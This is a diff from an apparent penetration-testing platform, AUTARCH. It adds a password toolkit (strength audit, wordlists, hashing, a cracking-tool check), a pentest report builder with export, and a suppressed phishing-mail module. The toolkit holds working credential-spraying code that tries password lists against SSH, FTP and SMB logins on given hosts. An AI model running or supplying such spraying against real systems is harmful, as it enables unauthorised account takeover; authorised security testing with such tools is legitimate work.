strength = 'strong'
|
||||
elif entropy >= 40 and checks['length_8']:
|
||||
strength = 'medium'
|
||||
elif entropy >= 28:
|
||||
strength = 'weak'
|
||||
else:
|
||||
strength = 'very_weak'
|
||||
|
||||
return {
|
||||
'length': len(password),
|
||||
'entropy': round(entropy, 1),
|
||||
'strength': strength,
|
||||
'checks': checks,
|
||||
'charset_size': charset_size,
|
||||
}
|
||||
|
||||
def _has_common_patterns(self, pw: str) -> bool:
|
||||
common = ['password', '123456', 'qwerty', 'abc123', 'letmein',
|
||||
'admin', 'welcome', 'monkey', 'dragon', 'master',
|
||||
'login', 'princess', 'football', 'shadow', 'sunshine',
|
||||
'trustno1', 'iloveyou', 'batman', 'access', 'hello']
|
||||
pl = pw.lower()
|
||||
return any(c in pl for c in common)
|
||||
|
||||
def _has_sequential(self, pw: str) -> bool:
|
||||
for i in range(len(pw) - 2):
|
||||
if (ord(pw[i]) + 1 == ord(pw[i+1]) == ord(pw[i+2]) - 1):
|
||||
return True
|
||||
return False
|
||||
|
||||
def _has_repeated(self, pw: str) -> bool:
|
||||
for i in range(len(pw) - 2):
|
||||
if pw[i] == pw[i+1] == pw[i+2]:
|
||||
return True
|
||||
return False
|
||||
|
||||
# ── Credential Spray / Stuff ──────────────────────────────────────────
|
||||
|
||||
def credential_spray(self, targets: List[dict], passwords: List[str],
|
||||
protocol: str = 'ssh', threads: int = 4,
|
||||
delay: float = 1.0) -> dict:
|
||||
"""Spray passwords against target services.
|
||||
|
||||
targets: [{'host': '...', 'port': 22, 'username': 'admin'}, ...]
|
||||
protocol: 'ssh', 'ftp', 'smb', 'http_basic', 'http_form'
|
||||
"""
|
||||
if not targets or not passwords:
|
||||
return {'ok': False, 'error': 'Targets and passwords required'}
|
||||
|
||||
job_id = f'spray_{int(time.time())}_{secrets.token_hex(4)}'
|
||||
result_holder = {
|
||||
'done': False,
|
||||
'results': [],
|
||||
'total': len(targets) * len(passwords),
|
||||
'tested': 0,
|
||||
'found': [],
|
||||
}
|
||||
self._active_jobs[job_id] = result_holder
|
||||
|
||||
def do_spray():
|
||||
import socket as sock_mod
|
||||
for target in targets:
|
||||
host = target.get('host', '')
|
||||
port = target.get('port', 0)
|
||||
username = target.get('username', '')
|
||||
for pw in passwords:
|
||||
if protocol == 'ssh':
|
||||
ok = self._test_ssh(host, port or 22, username, pw)
|
||||
elif protocol == 'ftp':
|
||||
ok = self._test_ftp(host, port or 21, username, pw)
|
||||
elif protocol == 'smb':
|
||||
ok = self._test_smb(host, port or 445, username, pw)
|
||||
else:
|
||||
ok = False
|
||||
|
||||
result_holder['tested'] += 1
|
||||
if ok:
|
||||
cred = {'host': host, 'port': port, 'username': username,
|
||||
'password': pw, 'protocol': protocol}
|
||||
result_holder['found'].append(cred)
|
||||
|
||||
time.sleep(delay)
|
||||
result_holder['done'] = True
|
||||
|
||||
threading.Thread(target=do_spray, daemon=True).start()
|
||||
return {'ok': True, 'job_id': job_id,
|
||||
'message': f'Spray started: {len(targets)} targets × {len(passwords)} passwords'}
|
||||
|
||||
def _test_ssh(self, host: str, port: int, user: str, pw: str) -> bool:
|
||||
try:
|
||||
import paramiko
|
||||
client = paramiko.SSHClient()
|
||||
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
client.connect(host, port=port, username=user, password=pw,
|
||||
timeout=5, look_for_keys=False, allow_agent=False)
|
||||
client.close()
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
def _test_ftp(self, host: str, port: int, user: str, pw: str) -> bool:
|
||||
try:
|
||||
import ftplib
|
||||
ftp = ftplib.FTP()
|
||||
ftp.connect(host, port, timeout=5)
|
||||
ftp.login(user, pw)
|
||||
ftp.quit()
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
def _test_smb(self, host: str, port: int, user: str, pw: str) -> bool:
|
||||
try:
|
||||
from impacket.smbconnection import SMBConnection
|
||||
conn = SMBConnection(host, host, sess_port=port)
|
||||
conn.login(user, pw)
|
||||
conn.close()
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
def get_spray_status(self, job_id: str) -> dict:
|
||||
holder = self._active_jobs.get(job_id)
|
||||
if not holder:
|
||||
return {'ok': False, 'error': 'Job not found'}
|
||||
return {
|
||||
'ok': True,
|
||||
'done': holder['done'],
|
||||
'tested': holder['tested'],
|
||||
'total': holder['total'],
|
||||
'found': holder['found'],
|
||||
}
|
||||
|
||||
# ── Wordlist Management ───────────────────────────────────────────────
|
||||
|
||||
def list_wordlists(self) -> List[dict]:
|
||||
"""List available wordlists."""
|
||||
results = []
|
||||
for f in Path(self._wordlists_dir).glob('*'):
|
||||
if f.is_file():
|
||||
size = f.stat().st_size
|
||||
line_count = 0
|
||||
try:
|
||||
with open(f, 'r', encoding='utf-8', errors='ignore') as fh:
|
||||
for _ in fh:
|
||||
line_count += 1
|
||||
if line_count > 10_000_000:
|
||||
break
|
||||
except Exception:
|
||||
pass
|
||||
results.append({
|
||||
'name': f.name,
|
||||
'path': str(f),
|
||||
'size': size,
|
||||
'size_human': self._human_size(size),
|
||||
'lines': line_count,
|
||||
})
|
||||
# Also check common system locations
|
||||
system_lists = [
|
||||
'/usr/share/wordlists/rockyou.txt',
|
||||
'/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt',
|
||||
'/usr/share/wordlists/fasttrack.txt',
|
||||
]
|
||||
for path in system_lists:
|
||||
if os.path.exists(path) and not any(r['path'] == path for r in results):
|
||||
size = os.path.getsize(path)
|
||||
results.append({
|
||||
'name': os.path.basename(path),
|
||||
'path': path,
|
||||
'size': size,
|
||||
'size_human': self._human_size(size),
|
||||
'lines': -1, # Don't count for system lists
|
||||
'system': True,
|
||||
})
|
||||
return results
|
||||
|
||||
def _find_default_wordlist(self) -> str:
|
||||
"""Find the best available wordlist."""
|
||||
# Check our wordlists dir first
|
||||
for f in Path(self._wordlists_dir).glob('*'):
|
||||
if f.is_file() and f.stat().st_size > 100:
|
||||
return str(f)
|
||||
# System locations
|
||||
candidates = [
|
||||
'/usr/share/wordlists/rockyou.txt',
|
||||
'/usr/share/wordlists/fasttrack.txt',
|
||||
'/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt',
|
||||
]
|
||||
for c in candidates:
|
||||
if os.path.exists(c):
|
||||
return c
|
||||
return ''
|
||||
|
||||
def upload_wordlist(self, filename: str, data: bytes) -> dict:
|
||||
"""Save an uploaded wordlist."""
|
||||
safe_name = re.sub(r'[^a-zA-Z0-9._-]', '_', filename)
|
||||
path = os.path.join(self._wordlists_dir, safe_name)
|
||||
with open(path, 'wb') as f:
|
||||
f.write(data)
|
||||
return {'ok': True, 'path': path, 'name': safe_name}
|
||||
|
||||
def delete_wordlist(self, name: str) -> dict:
|
||||
path = os.path.join(self._wordlists_dir, name)
|
||||
if os.path.exists(path):
|
||||
os.remove(path)
|
||||
return {'ok': True}
|
||||
return {'ok': False, 'error': 'Wordlist not found'}
|
||||
|
||||
# ── Hash Generation (for testing) ─────────────────────────────────────
|
||||
|
||||
def hash_string(self, plaintext: str, algorithm: str = 'md5') -> dict:
|
||||
"""Hash a string with a given algorithm."""
|
||||
algo_map = {
|
||||
'md5': hashlib.md5,
|
||||
'sha1': hashlib.sha1,
|
||||
'sha224': hashlib.sha224,
|
||||
'sha256': hashlib.sha256,
|
||||
'sha384': hashlib.sha384,
|
||||
'sha512': hashlib.sha512,
|
||||
}
|
||||
fn = algo_map.get(algorithm.lower())
|
||||
if not fn:
|
||||
return {'ok': False, 'error': f'Unsupported algorithm: {algorithm}'}
|
||||
h = fn(plaintext.encode('utf-8')).hexdigest()
|
||||
return {'ok': True, 'hash': h, 'algorithm': algorithm, 'plaintext': plaintext}
|
||||
|
||||
# ── Tool Detection ────────────────────────────────────────────────────
|
||||
|
||||
def get_tools_status(self) -> dict:
|
||||
"""Check which cracking tools are available."""
|
||||
return {
|
||||
'hashcat': bool(find_tool('hashcat')),
|
||||
'john': bool(find_tool('john')),
|
||||
'hydra': bool(find_tool('hydra')),
|
||||
'ncrack': bool(find_tool('ncrack')),
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def _human_size(size: int) -> str:
|
||||
for unit in ('B', 'KB', 'MB', 'GB'):
|
||||
if size < 1024:
|
||||
return f'{size:.1f} {unit}'
|
||||
size /= 1024
|
||||
return f'{size:.1f} TB'
|
||||
|
||||
|
||||
# ── Singleton ─────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
_lock = threading.Lock()
|
||||
|
||||
|
||||
def get_password_toolkit() -> PasswordToolkit:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
with _lock:
|
||||
if _instance is None:
|
||||
_instance = PasswordToolkit()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI ───────────────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""Interactive CLI for Password Toolkit."""
|
||||
svc = get_password_toolkit()
|
||||
|
||||
while True:
|
||||
print("\n╔═══════════════════════════════════════╗")
|
||||
print("║ PASSWORD TOOLKIT ║")
|
||||
print("╠═══════════════════════════════════════╣")
|
||||
print("║ 1 — Identify Hash ║")
|
||||
print("║ 2 — Crack Hash ║")
|
||||
print("║ 3 — Generate Passwords ║")
|
||||
print("║ 4 — Audit Password Strength ║")
|
||||
print("║ 5 — Hash a String ║")
|
||||
print("║ 6 — Wordlist Management ║")
|
||||
print("║ 7 — Tool Status ║")
|
||||
print("║ 0 — Back ║")
|
||||
print("╚═══════════════════════════════════════╝")
|
||||
|
||||
choice = input("\n Select: ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
h = input(" Hash: ").strip()
|
||||
if not h:
|
||||
continue
|
||||
results = svc.identify_hash(h)
|
||||
if results:
|
||||
print(f"\n Possible types ({len(results)}):")
|
||||
for r in results:
|
||||
print(f" [{r['confidence'].upper():6s}] {r['name']}"
|
||||
f" (hashcat: {r['hashcat_mode']}, john: {r['john_format']})")
|
||||
else:
|
||||
print(" No matching hash types found.")
|
||||
elif choice == '2':
|
||||
h = input(" Hash: ").strip()
|
||||
wl = input(" Wordlist (empty=default): ").strip()
|
||||
result = svc.crack_hash(h, wordlist=wl)
|
||||
if result.get('job_id'):
|
||||
print(f" {result['message']}")
|
||||
print(" Waiting...")
|
||||
while True:
|
||||
time.sleep(2)
|
||||
s = svc.get_crack_status(result['job_id'])
|
||||
if s.get('done'):
|
||||
if s.get('cracked'):
|
||||
print(f"\n CRACKED: {s['cracked']}")
|
||||
else:
|
||||
print(f"\n Not cracked. {s.get('message', '')}")
|
||||
break
|
||||
elif result.get('cracked'):
|
||||
print(f"\n CRACKED: {result['cracked']}")
|
||||
else:
|
||||
print(f" {result.get('message', result.get('error', ''))}")
|
||||
elif choice == '3':
|
||||
length = int(input(" Length (default 16): ").strip() or '16')
|
||||
count = int(input(" Count (default 5): ").strip() or '5')
|
||||
passwords = svc.generate_password(length=length, count=count)
|
||||
print("\n Generated passwords:")
|
||||
for pw in passwords:
|
||||
audit = svc.audit_password(pw)
|
||||
print(f" {pw} [{audit['strength']}] {audit['entropy']} bits")
|
||||
elif choice == '4':
|
||||
pw = input(" Password: ").strip()
|
||||
if not pw:
|
||||
continue
|
||||
audit = svc.audit_password(pw)
|
||||
print(f"\n Strength: {audit['strength']}")
|
||||
print(f" Entropy: {audit['entropy']} bits")
|
||||
print(f" Length: {audit['length']}")
|
||||
print(f" Charset: {audit['charset_size']} characters")
|
||||
for check, passed in audit['checks'].items():
|
||||
mark = '\033[92m✓\033[0m' if passed else '\033[91m✗\033[0m'
|
||||
print(f" {mark} {check}")
|
||||
elif choice == '5':
|
||||
text = input(" Plaintext: ").strip()
|
||||
algo = input(" Algorithm (md5/sha1/sha256/sha512): ").strip() or 'sha256'
|
||||
r = svc.hash_string(text, algo)
|
||||
if r['ok']:
|
||||
print(f" {r['algorithm']}: {r['hash']}")
|
||||
else:
|
||||
print(f" Error: {r['error']}")
|
||||
elif choice == '6':
|
||||
wls = svc.list_wordlists()
|
||||
if wls:
|
||||
print(f"\n Wordlists ({len(wls)}):")
|
||||
for w in wls:
|
||||
sys_tag = ' [system]' if w.get('system') else ''
|
||||
print(f" {w['name']} — {w['size_human']}{sys_tag}")
|
||||
else:
|
||||
print(" No wordlists found.")
|
||||
elif choice == '7':
|
||||
tools = svc.get_tools_status()
|
||||
print("\n Tool Status:")
|
||||
for tool, available in tools.items():
|
||||
mark = '\033[92m✓\033[0m' if available else '\033[91m✗\033[0m'
|
||||
print(f" {mark} {tool}")
|
||||
1489
modules/phishmail.py
Normal file
1489
modules/phishmail.py
Normal file
File diff suppressed because it is too large
Load Diff
499
modules/report_engine.py
Normal file
499
modules/report_engine.py
Normal file
@ -0,0 +1,499 @@
|
||||
"""AUTARCH Reporting Engine
|
||||
|
||||
Structured pentest report builder with findings, CVSS scoring, evidence,
|
||||
and export to HTML/Markdown/JSON.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "Pentest report builder & exporter"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "analyze"
|
||||
|
||||
import os
|
||||
import json
|
||||
import time
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
from datetime import datetime, timezone
|
||||
from typing import Dict, List, Optional, Any
|
||||
from dataclasses import dataclass, field, asdict
|
||||
import threading
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
|
||||
# ── Finding Severity & CVSS ──────────────────────────────────────────────────
|
||||
|
||||
SEVERITY_MAP = {
|
||||
'critical': {'color': '#dc2626', 'score_range': '9.0-10.0', 'order': 0},
|
||||
'high': {'color': '#ef4444', 'score_range': '7.0-8.9', 'order': 1},
|
||||
'medium': {'color': '#f59e0b', 'score_range': '4.0-6.9', 'order': 2},
|
||||
'low': {'color': '#22c55e', 'score_range': '0.1-3.9', 'order': 3},
|
||||
'info': {'color': '#6366f1', 'score_range': '0.0', 'order': 4},
|
||||
}
|
||||
|
||||
FINDING_TEMPLATES = [
|
||||
{
|
||||
'id': 'sqli',
|
||||
'title': 'SQL Injection',
|
||||
'severity': 'critical',
|
||||
'cvss': 9.8,
|
||||
'description': 'The application is vulnerable to SQL injection, allowing an attacker to manipulate database queries.',
|
||||
'impact': 'Complete database compromise, data exfiltration, authentication bypass, potential remote code execution.',
|
||||
'remediation': 'Use parameterized queries/prepared statements. Implement input validation and WAF rules.',
|
||||
'references': ['OWASP Top 10: A03:2021', 'CWE-89'],
|
||||
},
|
||||
{
|
||||
'id': 'xss',
|
||||
'title': 'Cross-Site Scripting (XSS)',
|
||||
'severity': 'high',
|
||||
'cvss': 7.5,
|
||||
'description': 'The application reflects user input without proper sanitization, enabling script injection.',
|
||||
'impact': 'Session hijacking, credential theft, defacement, malware distribution.',
|
||||
'remediation': 'Encode all output, implement Content-Security-Policy, use framework auto-escaping.',
|
||||
'references': ['OWASP Top 10: A03:2021', 'CWE-79'],
|
||||
},
|
||||
{
|
||||
'id': 'broken_auth',
|
||||
'title': 'Broken Authentication',
|
||||
'severity': 'critical',
|
||||
'cvss': 9.1,
|
||||
'description': 'Authentication mechanisms can be bypassed or abused to gain unauthorized access.',
|
||||
'impact': 'Account takeover, privilege escalation, unauthorized data access.',
|
||||
'remediation': 'Implement MFA, rate limiting, secure session management, strong password policies.',
|
||||
'references': ['OWASP Top 10: A07:2021', 'CWE-287'],
|
||||
},
|
||||
{
|
||||
'id': 'idor',
|
||||
'title': 'Insecure Direct Object Reference (IDOR)',
|
||||
'severity': 'high',
|
||||
'cvss': 7.5,
|
||||
'description': 'The application exposes internal object references that can be manipulated to access unauthorized resources.',
|
||||
'impact': 'Unauthorized access to other users\' data, horizontal privilege escalation.',
|
||||
'remediation': 'Implement proper access control checks, use indirect references.',
|
||||
'references': ['OWASP Top 10: A01:2021', 'CWE-639'],
|
||||
},
|
||||
{
|
||||
'id': 'missing_headers',
|
||||
'title': 'Missing Security Headers',
|
||||
'severity': 'low',
|
||||
'cvss': 3.1,
|
||||
'description': 'The application does not implement recommended security headers.',
|
||||
'impact': 'Increased attack surface for clickjacking, MIME sniffing, and XSS attacks.',
|
||||
'remediation': 'Implement CSP, X-Frame-Options, X-Content-Type-Options, HSTS headers.',
|
||||
'references': ['OWASP Secure Headers Project'],
|
||||
},
|
||||
{
|
||||
'id': 'weak_ssl',
|
||||
'title': 'Weak SSL/TLS Configuration',
|
||||
'severity': 'medium',
|
||||
'cvss': 5.3,
|
||||
'description': 'The server supports weak SSL/TLS protocols or cipher suites.',
|
||||
'impact': 'Potential for traffic interception via downgrade attacks.',
|
||||
'remediation': 'Disable TLS 1.0/1.1, remove weak ciphers, enable HSTS.',
|
||||
'references': ['CWE-326', 'NIST SP 800-52'],
|
||||
},
|
||||
{
|
||||
'id': 'info_disclosure',
|
||||
'title': 'Information Disclosure',
|
||||
'severity': 'medium',
|
||||
'cvss': 5.0,
|
||||
'description': 'The application reveals sensitive information such as server versions, stack traces, or internal paths.',
|
||||
'impact': 'Aids attackers in fingerprinting and planning targeted attacks.',
|
||||
'remediation': 'Remove version headers, disable debug modes, implement custom error pages.',
|
||||
'references': ['CWE-200'],
|
||||
},
|
||||
{
|
||||
'id': 'default_creds',
|
||||
'title': 'Default Credentials',
|
||||
'severity': 'critical',
|
||||
'cvss': 9.8,
|
||||
'description': 'The system uses default or well-known credentials that have not been changed.',
|
||||
'impact': 'Complete system compromise with minimal effort.',
|
||||
'remediation': 'Enforce password change on first login, remove default accounts.',
|
||||
'references': ['CWE-798'],
|
||||
},
|
||||
{
|
||||
'id': 'eternalblue',
|
||||
'title': 'MS17-010 (EternalBlue)',
|
||||
'severity': 'critical',
|
||||
'cvss': 9.8,
|
||||
'description': 'The target is vulnerable to the EternalBlue SMB exploit (MS17-010).',
|
||||
'impact': 'Remote code execution with SYSTEM privileges, wormable exploit.',
|
||||
'remediation': 'Apply Microsoft patch MS17-010, disable SMBv1.',
|
||||
'references': ['CVE-2017-0144', 'MS17-010'],
|
||||
},
|
||||
{
|
||||
'id': 'open_ports',
|
||||
'title': 'Unnecessary Open Ports',
|
||||
'severity': 'low',
|
||||
'cvss': 3.0,
|
||||
'description': 'The target exposes network services that are not required for operation.',
|
||||
'impact': 'Increased attack surface, potential exploitation of exposed services.',
|
||||
'remediation': 'Close unnecessary ports, implement firewall rules, use network segmentation.',
|
||||
'references': ['CIS Benchmarks'],
|
||||
},
|
||||
]
|
||||
|
||||
|
||||
# ── Report Engine ─────────────────────────────────────────────────────────────
|
||||
|
||||
class ReportEngine:
|
||||
"""Pentest report builder with findings management and export."""
|
||||
|
||||
def __init__(self):
|
||||
self._data_dir = os.path.join(get_data_dir(), 'reports')
|
||||
os.makedirs(self._data_dir, exist_ok=True)
|
||||
|
||||
# ── Report CRUD ───────────────────────────────────────────────────────
|
||||
|
||||
def create_report(self, title: str, client: str = '',
|
||||
scope: str = '', methodology: str = '') -> dict:
|
||||
"""Create a new report."""
|
||||
report_id = str(uuid.uuid4())[:8]
|
||||
report = {
|
||||
'id': report_id,
|
||||
'title': title,
|
||||
'client': client,
|
||||
'scope': scope,
|
||||
'methodology': methodology or 'OWASP Testing Guide v4.2 / PTES',
|
||||
'executive_summary': '',
|
||||
'findings': [],
|
||||
'created_at': datetime.now(timezone.utc).isoformat(),
|
||||
'updated_at': datetime.now(timezone.utc).isoformat(),
|
||||
'status': 'draft',
|
||||
'author': 'AUTARCH',
|
||||
}
|
||||
self._save_report(report)
|
||||
return {'ok': True, 'report': report}
|
||||
|
||||
def get_report(self, report_id: str) -> Optional[dict]:
|
||||
path = os.path.join(self._data_dir, f'{report_id}.json')
|
||||
if not os.path.exists(path):
|
||||
return None
|
||||
with open(path, 'r') as f:
|
||||
return json.load(f)
|
||||
|
||||
def update_report(self, report_id: str, updates: dict) -> dict:
|
||||
report = self.get_report(report_id)
|
||||
if not report:
|
||||
return {'ok': False, 'error': 'Report not found'}
|
||||
for k, v in updates.items():
|
||||
if k in report and k not in ('id', 'created_at'):
|
||||
report[k] = v
|
||||
report['updated_at'] = datetime.now(timezone.utc).isoformat()
|
||||
self._save_report(report)
|
||||
return {'ok': True, 'report': report}
|
||||
|
||||
def delete_report(self, report_id: str) -> dict:
|
||||
path = os.path.join(self._data_dir, f'{report_id}.json')
|
||||
if os.path.exists(path):
|
||||
os.remove(path)
|
||||
return {'ok': True}
|
||||
return {'ok': False, 'error': 'Report not found'}
|
||||
|
||||
def list_reports(self) -> List[dict]:
|
||||
reports = []
|
||||
for f in Path(self._data_dir).glob('*.json'):
|
||||
try:
|
||||
with open(f, 'r') as fh:
|
||||
r = json.load(fh)
|
||||
reports.append({
|
||||
'id': r['id'],
|
||||
'title': r['title'],
|
||||
'client': r.get('client', ''),
|
||||
'status': r.get('status', 'draft'),
|
||||
'findings_count': len(r.get('findings', [])),
|
||||
'created_at': r.get('created_at', ''),
|
||||
'updated_at': r.get('updated_at', ''),
|
||||
})
|
||||
except Exception:
|
||||
continue
|
||||
reports.sort(key=lambda r: r.get('updated_at', ''), reverse=True)
|
||||
return reports
|
||||
|
||||
# ── Finding Management ────────────────────────────────────────────────
|
||||
|
||||
def add_finding(self, report_id: str, finding: dict) -> dict:
|
||||
report = self.get_report(report_id)
|
||||
if not report:
|
||||
return {'ok': False, 'error': 'Report not found'}
|
||||
finding['id'] = str(uuid.uuid4())[:8]
|
||||
finding.setdefault('severity', 'medium')
|
||||
finding.setdefault('cvss', 5.0)
|
||||
finding.setdefault('status', 'open')
|
||||
finding.setdefault('evidence', [])
|
||||
report['findings'].append(finding)
|
||||
report['updated_at'] = datetime.now(timezone.utc).isoformat()
|
||||
self._save_report(report)
|
||||
return {'ok': True, 'finding': finding}
|
||||
|
||||
def update_finding(self, report_id: str, finding_id: str,
|
||||
updates: dict) -> dict:
|
||||
report = self.get_report(report_id)
|
||||
if not report:
|
||||
return {'ok': False, 'error': 'Report not found'}
|
||||
for f in report['findings']:
|
||||
if f['id'] == finding_id:
|
||||
for k, v in updates.items():
|
||||
if k != 'id':
|
||||
f[k] = v
|
||||
report['updated_at'] = datetime.now(timezone.utc).isoformat()
|
||||
self._save_report(report)
|
||||
return {'ok': True, 'finding': f}
|
||||
return {'ok': False, 'error': 'Finding not found'}
|
||||
|
||||
def delete_finding(self, report_id: str, finding_id: str) -> dict:
|
||||
report = self.get_report(report_id)
|
||||
if not report:
|
||||
return {'ok': False, 'error': 'Report not found'}
|
||||
report['findings'] = [f for f in report['findings']
|
||||
if f['id'] != finding_id]
|
||||
report['updated_at'] = datetime.now(timezone.utc).isoformat()
|
||||
self._save_report(report)
|
||||
return {'ok': True}
|
||||
|
||||
def get_finding_templates(self) -> List[dict]:
|
||||
return FINDING_TEMPLATES
|
||||
|
||||
# ── Export ────────────────────────────────────────────────────────────
|
||||
|
||||
def export_html(self, report_id: str) -> Optional[str]:
|
||||
"""Export report as styled HTML."""
|
||||
report = self.get_report(report_id)
|
||||
if not report:
|
||||
return None
|
||||
|
||||
findings_html = ''
|
||||
sorted_findings = sorted(report.get('findings', []),
|
||||
key=lambda f: SEVERITY_MAP.get(f.get('severity', 'info'), {}).get('order', 5))
|
||||
for i, f in enumerate(sorted_findings, 1):
|
||||
sev = f.get('severity', 'info')
|
||||
color = SEVERITY_MAP.get(sev, {}).get('color', '#666')
|
||||
findings_html += f'''
|
||||
<div class="finding">
|
||||
<h3>{i}. {_esc(f.get('title', 'Untitled'))}</h3>
|
||||
<div class="finding-meta">
|
||||
<span class="severity" style="background:{color}">{sev.upper()}</span>
|
||||
<span>CVSS: {f.get('cvss', 'N/A')}</span>
|
||||
<span>Status: {f.get('status', 'open')}</span>
|
||||
</div>
|
||||
<h4>Description</h4><p>{_esc(f.get('description', ''))}</p>
|
||||
<h4>Impact</h4><p>{_esc(f.get('impact', ''))}</p>
|
||||
<h4>Remediation</h4><p>{_esc(f.get('remediation', ''))}</p>
|
||||
{'<h4>Evidence</h4><pre>' + _esc(chr(10).join(f.get('evidence', []))) + '</pre>' if f.get('evidence') else ''}
|
||||
{'<h4>References</h4><ul>' + ''.join('<li>' + _esc(r) + '</li>' for r in f.get('references', [])) + '</ul>' if f.get('references') else ''}
|
||||
</div>'''
|
||||
|
||||
# Summary stats
|
||||
severity_counts = {}
|
||||
for f in report.get('findings', []):
|
||||
s = f.get('severity', 'info')
|
||||
severity_counts[s] = severity_counts.get(s, 0) + 1
|
||||
|
||||
summary_html = '<div class="severity-summary">'
|
||||
for sev in ['critical', 'high', 'medium', 'low', 'info']:
|
||||
count = severity_counts.get(sev, 0)
|
||||
color = SEVERITY_MAP.get(sev, {}).get('color', '#666')
|
||||
summary_html += f'<div class="sev-box" style="border-color:{color}"><span class="sev-count" style="color:{color}">{count}</span><span class="sev-label">{sev.upper()}</span></div>'
|
||||
summary_html += '</div>'
|
||||
|
||||
html = f'''<!DOCTYPE html>
|
||||
<html><head><meta charset="utf-8"><title>{_esc(report.get('title', 'Report'))}</title>
|
||||
<style>
|
||||
body{{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',sans-serif;max-width:900px;margin:0 auto;padding:40px;color:#1a1a2e;line-height:1.6}}
|
||||
h1{{color:#0f1117;border-bottom:3px solid #6366f1;padding-bottom:10px}}
|
||||
h2{{color:#333;margin-top:2rem}}
|
||||
.meta{{color:#666;font-size:0.9rem;margin:1rem 0}}
|
||||
.finding{{border:1px solid #ddd;border-radius:8px;padding:1.5rem;margin:1rem 0;page-break-inside:avoid}}
|
||||
.finding h3{{margin-top:0;color:#1a1a2e}}
|
||||
.finding h4{{color:#555;margin:1rem 0 0.3rem;font-size:0.95rem}}
|
||||
.finding-meta{{display:flex;gap:1rem;margin:0.5rem 0}}
|
||||
.severity{{color:#fff;padding:2px 10px;border-radius:4px;font-size:0.8rem;font-weight:700}}
|
||||
pre{{background:#f5f5f5;padding:1rem;border-radius:4px;overflow-x:auto;font-size:0.85rem}}
|
||||
.severity-summary{{display:flex;gap:1rem;margin:1.5rem 0}}
|
||||
.sev-box{{border:2px solid;border-radius:8px;padding:0.75rem 1.5rem;text-align:center}}
|
||||
.sev-count{{font-size:1.5rem;font-weight:700;display:block}}
|
||||
.sev-label{{font-size:0.7rem;text-transform:uppercase;letter-spacing:0.05em}}
|
||||
.footer{{margin-top:3rem;padding-top:1rem;border-top:1px solid #ddd;font-size:0.8rem;color:#999}}
|
||||
</style></head><body>
|
||||
<h1>{_esc(report.get('title', 'Penetration Test Report'))}</h1>
|
||||
<div class="meta">
|
||||
<div><strong>Client:</strong> {_esc(report.get('client', 'N/A'))}</div>
|
||||
<div><strong>Date:</strong> {report.get('created_at', '')[:10]}</div>
|
||||
<div><strong>Author:</strong> {_esc(report.get('author', 'AUTARCH'))}</div>
|
||||
<div><strong>Status:</strong> {report.get('status', 'draft').upper()}</div>
|
||||
</div>
|
||||
|
||||
<h2>Executive Summary</h2>
|
||||
<p>{_esc(report.get('executive_summary', 'No executive summary provided.'))}</p>
|
||||
|
||||
<h2>Scope</h2>
|
||||
<p>{_esc(report.get('scope', 'No scope defined.'))}</p>
|
||||
|
||||
<h2>Methodology</h2>
|
||||
<p>{_esc(report.get('methodology', ''))}</p>
|
||||
|
||||
<h2>Findings Overview</h2>
|
||||
{summary_html}
|
||||
|
||||
<h2>Detailed Findings</h2>
|
||||
{findings_html if findings_html else '<p>No findings recorded.</p>'}
|
||||
|
||||
<div class="footer">
|
||||
Generated by AUTARCH Security Platform — {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M UTC')}
|
||||
</div>
|
||||
</body></html>'''
|
||||
return html
|
||||
|
||||
def export_markdown(self, report_id: str) -> Optional[str]:
|
||||
"""Export report as Markdown."""
|
||||
report = self.get_report(report_id)
|
||||
if not report:
|
||||
return None
|
||||
|
||||
md = f"# {report.get('title', 'Report')}\n\n"
|
||||
md += f"**Client:** {report.get('client', 'N/A')} \n"
|
||||
md += f"**Date:** {report.get('created_at', '')[:10]} \n"
|
||||
md += f"**Author:** {report.get('author', 'AUTARCH')} \n"
|
||||
md += f"**Status:** {report.get('status', 'draft')} \n\n"
|
||||
|
||||
md += "## Executive Summary\n\n"
|
||||
md += report.get('executive_summary', 'N/A') + "\n\n"
|
||||
|
||||
md += "## Scope\n\n"
|
||||
md += report.get('scope', 'N/A') + "\n\n"
|
||||
|
||||
md += "## Findings\n\n"
|
||||
sorted_findings = sorted(report.get('findings', []),
|
||||
key=lambda f: SEVERITY_MAP.get(f.get('severity', 'info'), {}).get('order', 5))
|
||||
for i, f in enumerate(sorted_findings, 1):
|
||||
md += f"### {i}. [{f.get('severity', 'info').upper()}] {f.get('title', 'Untitled')}\n\n"
|
||||
md += f"**CVSS:** {f.get('cvss', 'N/A')} | **Status:** {f.get('status', 'open')}\n\n"
|
||||
md += f"**Description:** {f.get('description', '')}\n\n"
|
||||
md += f"**Impact:** {f.get('impact', '')}\n\n"
|
||||
md += f"**Remediation:** {f.get('remediation', '')}\n\n"
|
||||
if f.get('evidence'):
|
||||
md += "**Evidence:**\n```\n" + '\n'.join(f['evidence']) + "\n```\n\n"
|
||||
if f.get('references'):
|
||||
md += "**References:** " + ', '.join(f['references']) + "\n\n"
|
||||
md += "---\n\n"
|
||||
|
||||
md += f"\n*Generated by AUTARCH — {datetime.now(timezone.utc).strftime('%Y-%m-%d')}*\n"
|
||||
return md
|
||||
|
||||
def export_json(self, report_id: str) -> Optional[str]:
|
||||
report = self.get_report(report_id)
|
||||
if not report:
|
||||
return None
|
||||
return json.dumps(report, indent=2)
|
||||
|
||||
# ── Internal ──────────────────────────────────────────────────────────
|
||||
|
||||
